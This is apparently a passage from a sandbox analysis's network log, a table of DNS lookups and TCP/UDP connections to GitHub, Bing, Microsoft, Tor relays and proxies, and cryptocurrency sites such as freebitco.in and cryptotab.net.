| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.112.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | 22.112.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 2.22.249.25:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 25.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 2.22.249.34:443 | r.bing.com | tcp |
| GB | 2.22.249.41:443 | r.bing.com | tcp |
| GB | 2.22.249.41:443 | r.bing.com | tcp |
| GB | 2.22.249.34:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 41.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | login.microsoftonline.com | udp |
| US | 8.8.8.8:53 | 14.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.109.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.243.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | drive.google.com | udp |
| GB | 142.250.200.14:443 | drive.google.com | tcp |
| US | 8.8.8.8:53 | drive.usercontent.google.com | udp |
| GB | 216.58.204.65:443 | drive.usercontent.google.com | tcp |
| US | 8.8.8.8:53 | 14.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.143.182.52.in-addr.arpa | udp |
| GB | 2.22.249.46:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 46.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 2.22.249.17:443 | th.bing.com | tcp |
| GB | 2.22.249.17:443 | th.bing.com | tcp |
| GB | 2.22.249.17:443 | th.bing.com | tcp |
| GB | 2.22.249.17:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 17.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | services.bingapis.com | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 8.8.8.8:53 | 80.5.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | outlook.live.com | udp |
| GB | 40.99.151.130:443 | outlook.live.com | tcp |
| GB | 40.99.151.130:443 | outlook.live.com | tcp |
| GB | 40.99.151.130:443 | outlook.live.com | udp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| GB | 2.17.5.133:443 | www.microsoft.com | tcp |
| US | 8.8.8.8:53 | 130.151.99.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.5.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 21.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.vidyard.com | udp |
| US | 151.101.129.181:443 | play.vidyard.com | tcp |
| US | 8.8.8.8:53 | 181.129.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.130.101.151.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.117.19.2.in-addr.arpa | udp |
| GB | 2.22.249.8:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 8.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 2.22.249.67:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| GB | 2.22.249.204:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | www.msn.com | udp |
| US | 8.8.8.8:53 | 67.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | c.msn.com | udp |
| IE | 13.74.129.1:443 | c.msn.com | tcp |
| US | 8.8.8.8:53 | browser.events.data.msn.com | udp |
| US | 8.8.8.8:53 | c.bing.com | udp |
| US | 13.89.179.13:443 | browser.events.data.msn.com | tcp |
| US | 13.89.179.13:443 | browser.events.data.msn.com | tcp |
| US | 13.107.21.237:443 | c.bing.com | tcp |
| GB | 2.22.249.204:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | 1.129.74.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.21.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.179.89.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 2.22.249.37:443 | th.bing.com | tcp |
| GB | 2.22.249.37:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 37.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | cdn-dynmedia-1.microsoft.com | udp |
| GB | 95.100.104.6:443 | cdn-dynmedia-1.microsoft.com | tcp |
| US | 8.8.8.8:53 | 6.104.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | deff.nelreports.net | udp |
| GB | 2.19.117.91:443 | deff.nelreports.net | tcp |
| US | 8.8.8.8:53 | 91.117.19.2.in-addr.arpa | udp |
| GB | 2.22.249.60:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 60.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| US | 8.8.8.8:53 | github.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.113.22:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | api.github.com | udp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 22.113.82.140.in-addr.arpa | udp |
| GB | 2.22.249.37:443 | r.bing.com | tcp |
| GB | 2.22.249.37:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| GB | 2.22.249.29:443 | th.bing.com | tcp |
| GB | 2.22.249.29:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 29.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | assets.msn.com | udp |
| GB | 2.22.249.217:443 | assets.msn.com | tcp |
| GB | 2.22.249.217:443 | assets.msn.com | tcp |
| US | 8.8.8.8:53 | fpt.microsoft.com | udp |
| US | 52.167.30.171:443 | fpt.microsoft.com | tcp |
| US | 8.8.8.8:53 | img-s-msn-com.akamaized.net | udp |
| GB | 2.19.117.168:443 | img-s-msn-com.akamaized.net | tcp |
| GB | 2.19.117.168:443 | img-s-msn-com.akamaized.net | tcp |
| GB | 2.19.117.168:443 | img-s-msn-com.akamaized.net | tcp |
| GB | 2.19.117.168:443 | img-s-msn-com.akamaized.net | tcp |
| GB | 2.19.117.168:443 | img-s-msn-com.akamaized.net | tcp |
| GB | 2.19.117.168:443 | img-s-msn-com.akamaized.net | tcp |
| US | 8.8.8.8:53 | 217.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.30.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | fpt2.microsoft.com | udp |
| US | 8.8.8.8:53 | 136.32.126.40.in-addr.arpa | udp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | cdn-dynmedia-1.microsoft.com | udp |
| GB | 95.100.104.22:443 | cdn-dynmedia-1.microsoft.com | tcp |
| US | 8.8.8.8:53 | 22.104.100.95.in-addr.arpa | udp |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:65436 | tcp | |
| DK | 85.235.250.88:443 | tcp | |
| US | 154.35.175.225:443 | tcp | |
| US | 69.162.139.9:9001 | tcp | |
| N/A | 127.0.0.1:65478 | tcp | |
| DE | 85.10.202.87:9001 | tcp | |
| SE | 171.25.193.9:80 | tcp | |
| US | 8.8.8.8:53 | 9.193.25.171.in-addr.arpa | udp |
| DE | 37.120.187.120:9001 | tcp | |
| US | 8.8.8.8:53 | 120.187.120.37.in-addr.arpa | udp |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| GB | 2.22.249.22:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 22.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 2.22.249.36:443 | th.bing.com | tcp |
| GB | 2.22.249.14:443 | r.bing.com | tcp |
| GB | 2.22.249.14:443 | r.bing.com | tcp |
| GB | 2.22.249.36:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 36.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | services.bingapis.com | udp |
| US | 13.107.5.80:443 | services.bingapis.com | tcp |
| US | 8.8.8.8:53 | www.torproject.org | udp |
| US | 204.8.99.146:443 | www.torproject.org | tcp |
| US | 204.8.99.146:443 | www.torproject.org | tcp |
| US | 8.8.8.8:53 | 146.99.8.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 204.8.99.146:443 | www.torproject.org | tcp |
| US | 204.8.99.146:443 | www.torproject.org | tcp |
| US | 204.8.99.146:443 | www.torproject.org | tcp |
| US | 204.8.99.146:443 | www.torproject.org | tcp |
| US | 8.8.8.8:53 | dist.torproject.org | udp |
| DE | 116.202.120.166:443 | dist.torproject.org | tcp |
| US | 8.8.8.8:53 | 166.120.202.116.in-addr.arpa | udp |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:54786 | tcp | |
| N/A | 127.0.0.1:9151 | tcp | |
| N/A | 127.0.0.1:54894 | tcp | |
| N/A | 127.0.0.1:55013 | tcp | |
| DE | 202.61.226.150:9001 | tcp | |
| US | 8.8.8.8:53 | 150.226.61.202.in-addr.arpa | udp |
| FI | 65.21.98.61:65012 | tcp | |
| DE | 146.0.40.193:9001 | tcp | |
| US | 8.8.8.8:53 | 61.98.21.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.40.0.146.in-addr.arpa | udp |
| N/A | 127.0.0.1:9150 | tcp | |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| GB | 2.22.249.41:443 | www.bing.com | tcp |
| N/A | 127.0.0.1:9150 | tcp | |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 8.8.8.8:53 | r.bing.com | udp |
| GB | 2.22.249.43:443 | r.bing.com | tcp |
| GB | 2.22.249.38:443 | r.bing.com | tcp |
| GB | 2.22.249.38:443 | r.bing.com | tcp |
| GB | 2.22.249.43:443 | r.bing.com | tcp |
| US | 8.8.8.8:53 | 43.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.249.22.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| US | 8.8.8.8:53 | freebitco.in | udp |
| US | 172.66.41.13:443 | freebitco.in | tcp |
| US | 172.66.41.13:443 | freebitco.in | tcp |
| US | 8.8.8.8:53 | 13.41.66.172.in-addr.arpa | udp |
| N/A | 127.0.0.1:9150 | tcp | |
| US | 8.8.8.8:53 | sirv.freebitco.in | udp |
| US | 8.8.8.8:53 | static1.freebitco.in | udp |
| US | 172.66.41.13:443 | static1.freebitco.in | tcp |
| US | 172.66.41.13:443 | static1.freebitco.in | tcp |
| US | 8.8.8.8:53 | captchas.freebitco.in | udp |
| US | 8.8.8.8:53 | pushpad.xyz | udp |
| US | 8.8.8.8:53 | hcaptcha.com | udp |
| US | 104.26.7.3:443 | pushpad.xyz | tcp |
| US | 172.66.42.243:443 | captchas.freebitco.in | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | challenges.cloudflare.com | udp |
| US | 104.19.230.21:443 | hcaptcha.com | tcp |
| US | 151.101.129.229:443 | cdn.jsdelivr.net | tcp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 8.8.8.8:53 | ajax.cloudflare.com | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.72.14:443 | ajax.cloudflare.com | tcp |
| US | 151.101.129.229:443 | cdn.jsdelivr.net | tcp |
| US | 8.8.8.8:53 | 99.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.42.66.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.24.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.7.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.72.17.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.129.101.151.in-addr.arpa | udp |
| US | 151.101.129.229:443 | cdn.jsdelivr.net | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| US | 104.18.95.41:443 | challenges.cloudflare.com | tcp |
| US | 8.8.8.8:53 | 10.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.230.19.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.95.18.104.in-addr.arpa | udp |
| US | 104.17.24.14:443 | cdnjs.cloudflare.com | tcp |
| US | 8.8.8.8:53 | cfpages.freebitco.in | udp |
| N/A | 127.0.0.1:9150 | tcp | |
| US | 8.8.8.8:53 | 36.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.179.250.142.in-addr.arpa | udp |
| US | 104.26.7.3:443 | pushpad.xyz | tcp |
| US | 104.19.230.21:443 | hcaptcha.com | tcp |
| US | 104.19.230.21:443 | hcaptcha.com | tcp |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | track.freebitco.in | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 216.239.32.36:443 | region1.google-analytics.com | tcp |
| US | 8.8.8.8:53 | 36.32.239.216.in-addr.arpa | udp |
| US | 172.66.41.13:443 | cfpages.freebitco.in | tcp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| GB | 2.19.117.148:443 | aefd.nelreports.net | tcp |
| GB | 2.19.117.148:443 | aefd.nelreports.net | tcp |
| US | 8.8.8.8:53 | 148.117.19.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| GB | 2.19.117.148:443 | aefd.nelreports.net | udp |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| US | 8.8.8.8:53 | challenges.cloudflare.com | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 172.66.41.13:443 | cfpages.freebitco.in | tcp |
| US | 172.66.41.13:443 | cfpages.freebitco.in | tcp |
| US | 104.19.230.21:443 | hcaptcha.com | tcp |
| US | 172.66.42.243:443 | cfpages.freebitco.in | tcp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| US | 104.17.72.14:443 | ajax.cloudflare.com | tcp |
| US | 151.101.129.229:443 | cdn.jsdelivr.net | udp |
| US | 8.8.8.8:53 | chart.googleapis.com | udp |
| US | 8.8.8.8:53 | static6.freebitco.in | udp |
| US | 8.8.8.8:53 | fbtc-audio.freebitco.in | udp |
| US | 216.239.32.36:443 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | static.hotjar.com | udp |
| CZ | 65.9.95.86:443 | static.hotjar.com | tcp |
| US | 8.8.8.8:53 | script.hotjar.com | udp |
| CZ | 65.9.95.91:443 | script.hotjar.com | tcp |
| US | 8.8.8.8:53 | 53.95.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.95.9.65.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.95.9.65.in-addr.arpa | udp |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| US | 8.8.8.8:53 | region1.google-analytics.com | udp |
| US | 8.8.8.8:53 | aefd.nelreports.net | udp |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| GB | 2.19.117.143:443 | aefd.nelreports.net | udp |
| US | 8.8.8.8:53 | 36.34.239.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 143.117.19.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| GB | 2.22.249.64:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 64.249.22.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 8.8.8.8:53 | th.bing.com | udp |
| US | 150.171.27.10:443 | tse1.mm.bing.net | tcp |
| GB | 2.22.249.50:443 | th.bing.com | tcp |
| US | 8.8.8.8:53 | 50.249.22.2.in-addr.arpa | udp |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| US | 8.8.8.8:53 | cryptotab.net | udp |
| US | 172.67.163.117:443 | cryptotab.net | tcp |
| US | 172.67.163.117:443 | cryptotab.net | tcp |
| US | 172.67.163.117:443 | cryptotab.net | tcp |
| US | 8.8.8.8:53 | 117.163.67.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | www.youtube.com | udp |
| GB | 142.250.179.238:443 | www.youtube.com | tcp |
| GB | 142.250.179.238:443 | www.youtube.com | udp |
| US | 8.8.8.8:53 | i.ytimg.com | udp |
| GB | 142.250.187.214:443 | i.ytimg.com | tcp |
| US | 8.8.8.8:53 | 238.179.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.187.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.cryptobrowser.site | udp |
| US | 104.26.7.17:443 | api.cryptobrowser.site | tcp |
| US | 8.8.8.8:53 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | tcp |
| US | 8.8.8.8:53 | static.doubleclick.net | udp |
| GB | 142.250.200.2:443 | googleads.g.doubleclick.net | udp |
| GB | 142.250.200.38:443 | static.doubleclick.net | tcp |
| GB | 142.250.200.38:443 | static.doubleclick.net | tcp |
| US | 8.8.8.8:53 | jnn-pa.googleapis.com | udp |
| GB | 142.250.200.42:443 | jnn-pa.googleapis.com | tcp |
| US | 8.8.8.8:53 | www.google.com | udp |
| GB | 142.250.200.42:443 | jnn-pa.googleapis.com | udp |
| GB | 142.250.200.36:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | 17.7.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | play.google.com | udp |
| GB | 172.217.169.78:443 | play.google.com | tcp |
| GB | 172.217.169.78:443 | play.google.com | udp |
| US | 8.8.8.8:53 | yt3.ggpht.com | udp |
| GB | 216.58.201.97:443 | yt3.ggpht.com | tcp |
| US | 8.8.8.8:53 | cdn.ctmedia.online | udp |
| US | 104.26.6.6:443 | cdn.ctmedia.online | tcp |
| US | 104.26.6.6:443 | cdn.ctmedia.online | tcp |
| US | 104.26.6.6:443 | cdn.ctmedia.online | tcp |
| US | 8.8.8.8:53 | 78.169.217.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.201.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.6.26.104.in-addr.arpa | udp |
| N/A | 127.0.0.1:9150 | tcp | |
| US | 216.239.34.36:443 | region1.google-analytics.com | udp |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9050 | tcp | |
| US | 8.8.8.8:53 | freebitco.in | udp |
| US | 8.8.8.8:53 | challenges.cloudflare.com | udp |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| GB | 172.217.169.78:443 | play.google.com | udp |
| N/A | 127.0.0.1:9150 | tcp | |
| US | 8.8.8.8:53 | fluidmoney.xyz | udp |
| GB | 18.172.88.59:443 | fluidmoney.xyz | tcp |
| GB | 18.172.88.59:443 | fluidmoney.xyz | tcp |
| US | 8.8.8.8:53 | api.meld.io | udp |
| US | 54.205.116.32:443 | api.meld.io | tcp |
| US | 54.205.116.32:443 | api.meld.io | tcp |
| US | 54.205.116.32:443 | api.meld.io | tcp |
| US | 54.205.116.32:443 | api.meld.io | tcp |
| US | 54.205.116.32:443 | api.meld.io | tcp |
| US | 54.205.116.32:443 | api.meld.io | tcp |
| US | 54.205.116.32:443 | api.meld.io | tcp |
| US | 8.8.8.8:53 | 59.88.172.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.200.250.142.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.116.205.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | images-country.meld.io | udp |
| GB | 18.165.160.94:443 | images-country.meld.io | tcp |
| US | 8.8.8.8:53 | images-paymentmethod.meld.io | udp |
| US | 8.8.8.8:53 | images-currency.meld.io | udp |
| US | 3.165.148.100:443 | images-paymentmethod.meld.io | tcp |
| US | 3.165.148.100:443 | images-paymentmethod.meld.io | tcp |
| GB | 54.230.10.106:443 | images-currency.meld.io | tcp |
| GB | 54.230.10.106:443 | images-currency.meld.io | tcp |
| US | 8.8.8.8:53 | 94.160.165.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | meldcrypto.com | udp |
| US | 8.8.8.8:53 | 100.148.165.3.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.10.230.54.in-addr.arpa | udp |
| US | 8.8.8.8:53 | images-serviceprovider.meld.io | udp |
| GB | 18.165.160.4:443 | images-serviceprovider.meld.io | tcp |
| N/A | 127.0.0.1:9150 | tcp | |
| US | 8.8.8.8:53 | 4.160.165.18.in-addr.arpa | udp |
| N/A | 127.0.0.1:9150 | tcp | |
| N/A | 127.0.0.1:9150 | tcp | |
| US | 8.8.8.8:53 | static1.freebitco.in | udp |
| US | 8.8.8.8:53 | sirv.freebitco.in | udp |
| US | 172.66.41.13:443 | sirv.freebitco.in | tcp |
| US | 172.66.41.13:443 | sirv.freebitco.in | tcp |
| US | 172.66.41.13:443 | sirv.freebitco.in | tcp |
| US | 172.66.41.13:443 | sirv.freebitco.in | tcp |
| US | 8.8.8.8:53 | pushpad.xyz | udp |
| US | 8.8.8.8:53 | captchas.freebitco.in | udp |
| US | 172.66.42.243:443 | captchas.freebitco.in | tcp |
| US | 8.8.8.8:53 | hcaptcha.com | udp |
| US | 172.66.41.13:443 | captchas.freebitco.in | tcp |
| US | 172.67.73.76:443 | pushpad.xyz | tcp |
| US | 8.8.8.8:53 | cdn.jsdelivr.net | udp |
| GB | 142.250.200.36:443 | www.google.com | udp |
| US | 8.8.8.8:53 | cdnjs.cloudflare.com | udp |
| US | 104.19.229.21:443 | hcaptcha.com | tcp |
| US | 8.8.8.8:53 | ajax.cloudflare.com | udp |
| US | 151.101.193.229:443 | cdn.jsdelivr.net | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.17.72.14:443 | ajax.cloudflare.com | tcp |
| US | 151.101.193.229:443 | cdn.jsdelivr.net | udp |
| US | 104.17.25.14:443 | cdnjs.cloudflare.com | tcp |
| US | 104.19.229.21:443 | hcaptcha.com | tcp |
| US | 8.8.8.8:53 | chart.googleapis.com | udp |
| US | 8.8.8.8:53 | cfpages.freebitco.in | udp |
